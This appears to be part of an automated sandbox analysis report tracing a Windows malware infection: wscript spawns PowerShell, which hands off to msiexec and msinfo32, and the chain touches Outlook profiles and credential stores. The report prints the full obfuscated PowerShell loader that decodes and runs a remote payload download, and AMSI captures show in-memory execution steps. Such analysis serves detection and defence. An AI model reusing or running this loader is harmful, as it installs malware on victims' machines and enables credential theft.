          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe | Process created: C:\Windows\SysWOW64\msinfo32.exe "C:\Windows\SysWOW64\msinfo32.exe"
          Source: C:\Windows\SysWOW64\msinfo32.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c ping 6777.6777.6777.677e
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Lediggang Graadighedens Disciplineringer Bagermestrene Teutonisk Uptilt #>;$Spegeplserne='Nymaledes';<#Messiness Compromising Anaphalis Gennemarbejdelsen Fodervikkerne #>;$Laparotomize140=$host.'PrivateData';If ($Laparotomize140) {$Trikotagefabrikker++;}function Spdbarnsplejerens($Ledningernes){$Annelism=$Totlafholdenhed61+$Ledningernes.Length-$Trikotagefabrikker; for( $Omgik=7;$Omgik -lt $Annelism;$Omgik+=8){$Methodisers='Exuscitate';$Protaspis+=$Ledningernes[$Omgik];$Newsroom204='Dkfjers';}$Protaspis;}function Optllingslister($baulky){ & ($Unark) ($baulky);}$Steamboating=Spdbarnsplejerens 'MouthfuMDecollaoUarb,jdzRaabaaniUdf ldelundertilAntipreaNebra.k/Averrab5stedbrd.Faglrer0 Ful,vr Blottel(Porch dWB taliniAfgangsnRati,nedPopuliso Ove clwAllokatsBegnawn HjertebN Kal etTTempl r Materia1Haunche0Waylanr. instit0Gri tmi;Departe c araciW,uccubei.aftkjonandest 6Eardro 4 Increa; Delege Finansrx Uterom6 mysti 4Fgtmedd;a,reste barramurMacroptvKonvolu:Re ligh1 Graph 2Argenti1Delubru.Apace a0Bebutto)Lystbaa unquietG Spelmae TwelfhcAttak ekSkamrdmoQuantis/Persona2Hemidom0Noggkas1 Nonchr0,anebry0Jaszmal1Futu is0Ud lugt1 Arquat BararmFLikenesiQuizzysrIchthyoeLuncherfOzoniz.oRaastofx.hefmgl/Gra,bea1Aym sar2 Fje,ne1.ongrat.Andelss0No merc ';$Railcard=Spdbarnsplejerens 'syltdepuSoapfissdkningsESvartidRRidning- Er,rinA PainkigOverophE GustinN NegatiTForkerk ';$Ekspatrieret=Spdbarnsplejerens 'Bille thG,ilingtThrenodtBibliotpNonevilsSkydere:Evangel/ mpetu/ Fili,tp DatostuSpecialb Blomme-Tremour2pladshof Achi l7Nipsetsd Quater0 upersu7gagered1Vgtford5 Repr.f3,nakepreGreeneraHousefl1ev kost4 B.odsp0Moduler3Ansamle1Jengene8Sockhea4 leopardStengun6Bioscie2Tonikum2U,ifiab6Skammel6Litigatd Ind kr9unperv.cAfisnin2Regiona8theodraeAngolan4S hoolb1 Thelyt. 
StavnsrTeleotr2T pefli.drmmebid ConspieMicrotovTopchef/UdlistnnTaagetmePennyspdDr gbolkRiddersoTrvlerng KrgendeRecan.e. betacim Kruspes DeadmeoHusass ';$Overrigidness=Spdbarnsplejerens 'Soapyre>Indsnus ';$Unark=Spdbarnsplejerens 'Terningi,vergeneSlank ixKaosets ';$Metaprescutum='Caddises';$Arkivskab='\Nationalsocialisternes.Ska';Optllingslister (Spdbarnsplejerens 'Uhjlpso$BepaidlgBetali lRea izaoDisser,bEspartoATyr fgtlKlderen:Cebid nm ogejome S ppreKPapembaa Oblig.NklinikliBankemaShaplontMo dsgnieFinlandRHenns.n= N.trog$ ego,seEPlasmasn.ultideVIllegit:Bu.kladApel,rgoPRakitispQuincyuD GuidebA antasiTThomisiAUnhands+wasabis$Racial,aN nsurgRUnmercekForsortiDolomitVAmn,monS Et,opikBulwarkAPungpebbBowkerb ');Optllingslister (Spdbarnsplejerens 'Excla,m$KronpriGOpvaskelStumbleO otulisB Forma,aSulfosrLDiscolo: NightiITendo.oNUnwiseqd Libra i BesselSpakhusetWindburi PneumoNE,rthwacAdaptivtAgranulNFlambeeESlingreSAnnot tsUdv elg= Orchit$UncapiteLinj,skKReflektsBleeralPEnta glAKannikkTBedstevRIagttagiSnotdumEnabofamrnostalgePara.phTAcrolog.Reak orSB listip pologeLRhipidoI esidenTDonnere(Hematoz$zenithwoRadi
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 6777.6777.6777.677e
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe | Process created: C:\Windows\SysWOW64\msinfo32.exe "C:\Windows\SysWOW64\msinfo32.exe"
          Source: C:\Windows\SysWOW64\msinfo32.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\PING.EXE | Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\PING.EXE | Section loaded: mswsock.dll
          Source: C:\Windows\System32\PING.EXE | Section loaded: dnsapi.dll
          Source: C:\Windows\System32\PING.EXE | Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: mfc42u.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: winsqlite3.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: vaultcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: Binary string: msinfo32.pdb source: msiexec.exe, 0000000B.00000003.2464231519.0000000024601000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: bqm.Core.pdb4 source: powershell.exe, 00000006.00000002.2057275222.0000000008137000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: msiexec.exe, 0000000B.00000003.2397408093.00000000244C5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: msiexec.exe, msiexec.exe, 0000000B.00000003.2397408093.00000000244C5000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe
          Source: Binary string: msinfo32.pdbGCTL source: msiexec.exe, 0000000B.00000003.2464231519.0000000024601000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          Source: Yara matchFile source: 00000006.00000002.2059480573.000000000CD15000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2059188423.00000000085C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1862118797.0000020AF32F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2043963608.0000000005918000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Rentenedsttelsen)$gloBAl:GaRNisOnerEs = [SYSTem.texT.eNcOdING]::AScii.GETStRiNg($chemIStriES)$gLobaL:FORTiD=$GArNisONeReS.SuBStRING($DEfEnSiBLE,$CLOYmeNt112)<#Householding Semital Du
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Guanethidine $Regalizes $Victorianerne), (Angloficeret @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Blecidere = [AppDomain]::CurrentDomain.GetAssemblies
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Slotsholmen242)), $Reladling188).DefineDynamicModule($Ganelyd, $false).DefineType($jesyn, $Oddlegs, [System.MulticastDelegate])$Anatom
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Rentenedsttelsen)$gloBAl:GaRNisOnerEs = [SYSTem.texT.eNcOdING]::AScii.GETStRiNg($chemIStriES)$gLobaL:FORTiD=$GArNisONeReS.SuBStRING($DEfEnSiBLE,$CLOYmeNt112)<#Householding Semital Du
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Lediggang Graadighedens Disciplineringer Bagermestrene Teutonisk Uptilt #>;$Spegeplserne='Nymaledes';<#Messiness Compromising Anaphalis Gennemarbejdelsen Fodervikkerne #>;$Laparotomize140=$host.'PrivateData';If ($Laparotomize140) {$Trikotagefabrikker++;}function Spdbarnsplejerens($Ledningernes){$Annelism=$Totlafholdenhed61+$Ledningernes.Length-$Trikotagefabrikker; for( $Omgik=7;$Omgik -lt $Annelism;$Omgik+=8){$Methodisers='Exuscitate';$Protaspis+=$Ledningernes[$Omgik];$Newsroom204='Dkfjers';}$Protaspis;}function Optllingslister($baulky){ & ($Unark) ($baulky);}$Steamboating=Spdbarnsplejerens 'MouthfuMDecollaoUarb,jdzRaabaaniUdf ldelundertilAntipreaNebra.k/Averrab5stedbrd.Faglrer0 Ful,vr Blottel(Porch dWB taliniAfgangsnRati,nedPopuliso Ove clwAllokatsBegnawn HjertebN Kal etTTempl r Materia1Haunche0Waylanr. instit0Gri tmi;Departe c araciW,uccubei.aftkjonandest 6Eardro 4 Increa; Delege Finansrx Uterom6 mysti 4Fgtmedd;a,reste barramurMacroptvKonvolu:Re ligh1 Graph 2Argenti1Delubru.Apace a0Bebutto)Lystbaa unquietG Spelmae TwelfhcAttak ekSkamrdmoQuantis/Persona2Hemidom0Noggkas1 Nonchr0,anebry0Jaszmal1Futu is0Ud lugt1 Arquat BararmFLikenesiQuizzysrIchthyoeLuncherfOzoniz.oRaastofx.hefmgl/Gra,bea1Aym sar2 Fje,ne1.ongrat.Andelss0No merc ';$Railcard=Spdbarnsplejerens 'syltdepuSoapfissdkningsESvartidRRidning- Er,rinA PainkigOverophE GustinN NegatiTForkerk ';$Ekspatrieret=Spdbarnsplejerens 'Bille thG,ilingtThrenodtBibliotpNonevilsSkydere:Evangel/ mpetu/ Fili,tp DatostuSpecialb Blomme-Tremour2pladshof Achi l7Nipsetsd Quater0 upersu7gagered1Vgtford5 Repr.f3,nakepreGreeneraHousefl1ev kost4 B.odsp0Moduler3Ansamle1Jengene8Sockhea4 leopardStengun6Bioscie2Tonikum2U,ifiab6Skammel6Litigatd Ind 